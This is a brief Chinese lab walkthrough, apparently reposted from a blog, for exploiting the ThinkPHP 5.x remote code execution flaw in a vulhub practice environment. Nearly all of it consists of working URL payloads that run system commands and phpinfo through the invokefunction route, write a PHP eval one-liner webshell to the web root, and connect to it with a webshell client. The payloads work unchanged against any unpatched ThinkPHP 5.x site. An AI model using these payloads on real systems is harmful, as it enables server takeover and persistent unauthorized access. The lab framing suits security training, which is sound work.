Thinkphp5x远程命令执行 靶场攻略
环境配置
靶场:vulhub/thinkphp/5-rce
docker-compose up -d #启动环境
漏洞复现
1.访问靶场:http://172.16.1.198:8080/
2.远程命令执⾏
POC:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=whoami
3.远程代码执行
POC:
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1
4.写入一句话木马到根目录下的1.php
POC:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]);?>" > 1.php
5.蚁剑连接
原文地址:https://blog.csdn.net/2301_81881972/article/details/142466091
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!